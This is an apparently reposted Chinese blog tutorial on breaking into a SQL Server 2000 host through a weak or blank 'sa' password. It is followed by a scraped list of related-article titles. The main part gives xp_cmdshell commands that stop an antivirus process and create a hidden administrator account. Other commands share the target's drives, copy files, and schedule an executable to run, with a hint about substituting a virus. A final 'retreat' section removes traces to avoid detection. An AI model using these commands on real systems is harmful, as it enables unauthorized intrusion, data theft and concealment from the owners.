常见SQL Server 2000漏洞及其相关利用2
转自:http://blog.sina.com.cn/s/blog_5070b2cd01008blt.html
要***主机IP:192.168.11.56
前提是:
1.对方主机有安装SQL server软件
2.知道sa(SQL的帐号)的密码(一般情况下,的密码为空或是sa)。
开始***:
1.打开自己的sql 客户端查询分析器
输入192.168.11.56启动对方sql server服务器
2.调用sql server的xp_cmdshell命令
exec xp_cmdshell "net start" 注释:查看对方开启的服务,寻找对方有无杀毒软件。
exec xp_cmdshell "net stop savroam" 注释:savroam为一个杀毒软件进程,这条命令是关闭该进程。
exec xp_cmdshell "net user test 123456 /add" 注释:在对方主机创建帐户:test 密码:123456
exec xp_cmdshell "net user " 注释:查看对方现有帐户,确认test已经加入。
exec xp_cmdshell "net localgroup administrators test /add" 注释:把test加入管理员组,获得更高权限。
exec xp_cmdshell "net start server" 开启对方共享服务,如果在第一条命令中有 server 服务,这步可以省。
exec xp_cmdshell "net share d=d:\" 注释:把对方D盘共享。
exec xp_cmdshell "net share test=c:\oracle" 注释:或者只共享C盘下的oracle文件夹,共享名test。
exec xp_cmdshell "at 20:00 c:\qq.exe" 注释:让对方在20点自动开启QQ。如果把QQ换成病毒,呵呵……
3.通过IE进行***
在IE地址栏中输入\\192.168.11.56(对方IP),在对方共享的文件夹中找出你想要的文件进行复制。
4.撤退(清除你的修改,以免被发现。)
xp_cmdshell "net share test /delete" 注释:删除test共享。
xp_cmdshell "net share d /delete" 注释:删除D盘共享。
xp_cmdshell "net share" 注释: 查看还有哪些共享。
xp_cmdshell "net localgroup administrators test /delete" 注释:让帐号test离开管理员组。
xp_cmdshell "net user test /delete" 注释:删除test帐号
mdshell "net stop server" 注释:停止共享服务
xp_cmdshell "net start savroam" 注释:开启对方杀毒软件
转载于:https://blog.51cto.com/526869727/1561995
常见SQL Server 2000漏洞及其相关利用2相关推荐
- 解决安装SQL Server 2000提示文件挂起的一般方法
前天,帮项目小组的成员安装SQL Server 2000,遇到文件挂起问题,到网上搜了一下,很快解决了,随后看到更多的解决方法,在此我只是记下一般的解决方法,以便以后使用: 进入regedit注册表, ...
- 利用虚拟硬盘(把内存当作硬盘)来提高数据库的效率(目前只针对SQL Server 2000)可以提高很多...
上一篇:让你的笔记本更快一点--我的笔记本的性能测试和虚拟硬盘(把内存当成硬盘)的使用感觉 虚拟硬盘:就是把内存当作硬盘来用,比如有2G的内存,那么可以拿出来1G的内存当作硬盘来用. 自从知道了&qu ...
- 从SQL Server 2000/2005到SQL Server 2008的升级测试
本文部分内容摘自<SQL Server 2008管理实战>,人民邮电出版社:<深入MSSQL 2008升级和应用程序的兼容性>,IT专家网:<SQL Server 200 ...
- Microsoft SQL Server 2000整合规划
Microsoft SQL Server 2000整合规划 更新日期: 2004年06月24日 SQL Server技术文章 作者:Allan Hirt 投稿人:Tom Davidson和Shaun ...
- Oracle 9i与MS SQL Server 2000之比较连载五.zz
http://kb.cnblogs.com/a/1153156 Oracle 9i与MS SQL Server 2000之比较连载五 2008-04-14 18:13 四.Oracle中新的数据库对象 ...
- [翻译] - Inside SQL Server 2000's Memory Management Facilities
原文地址:Inside SQL Server 2000's Memory Management Facilities 翻译:RicCC Ken Henderson Microsoft ...
- SQL Server 2000+ADO.NET实现并发控制
2.2 SQL Server 2000+ADO.NET实现并发控制 2.2.1 并发一致性问题 常见并发并发一致性问题包括:丢失的修改.不可重复读.读脏数据.幻影读(幻影读在一些资料中往往与不可重复读 ...
- 配置sql server 2000以允许远程访问
配置sql server 2000以允许远程访问 适合故障: 1. 用sql企业管理器能访问sql server 2000(因为它是采用命名管道(named pipes)方式进行方式),但用ado.n ...
- 《MS SQL Server 2000管理员手册》系列——8. 管理 Microsoft SQL Server 服务
8. 管理 Microsoft SQL Server 服务 SQL Server 服务组件 使用SQL Server服务管理员 使用 Windows 2000 服务控制管理员 使用 SQL Serve ...
最新文章
- 如何使用vs来运行box2d中Testbed的案例
- 单点登录与权限管理本质:cookie安全问题
- 青藏高原地下巨型空间形成原因
- java表单上下左右滚动_怎么在网页中实现表格上下左右滚动
- 台式计算机的速度,台式电脑运行速度慢怎么处理
- 行业看点 | 量子计算时代即将到来?华人科学家揭秘“天使粒子”背后故事……...
- 【华为云技术分享】云小课 | 磁盘容量不够用?小课教你来扩容!
- 米斯特白帽培训讲义(v2)信息收集
- 力扣 数组中的最长山脉
- 企业员工人事管理系统(数据库课设)
- loT行业生死竞速:Aqara绿米得用户得天下
- 不需要解压使用对pdf文件进行压缩
- Svn主分支次分支合并和版本回退
- 立志做文艺小清新的技术宅
- 八种可以简单判断否属于过敏体质的表现,符合四条就是了
- 如何通过一封恶意邮件追踪幕后黑客组织
- MySQL如何判断日期(datetime)是否是同一天
- 使用Jason's Utter Ramblings Repo的yum源出现warning: rpmt
- R语言和医学统计学系列(1):t检验
- 1分钟为Win10瘦身!把吃掉的硬盘找回来
热门文章
- 计算机系统注册表的由来,计算机系统注册表
- php的数组key删除,php删除数组的key
- python比较文件的修改时间,如何比较python中两个文件的修改日期?
- ubuntu12.04 php环境搭建,Ubuntu12.04筹建php开发环境
- mysql 自动 分库 备份_MySQL分库备份的方法
- java stream 使用局部变量
- TensorFlow tf.squeeze
- java多对多的存储_Swift CoreData,通过多对多关系保存数据
- 2020年中国网络安全市场全景图
- 腾讯云认证考试常见问题答疑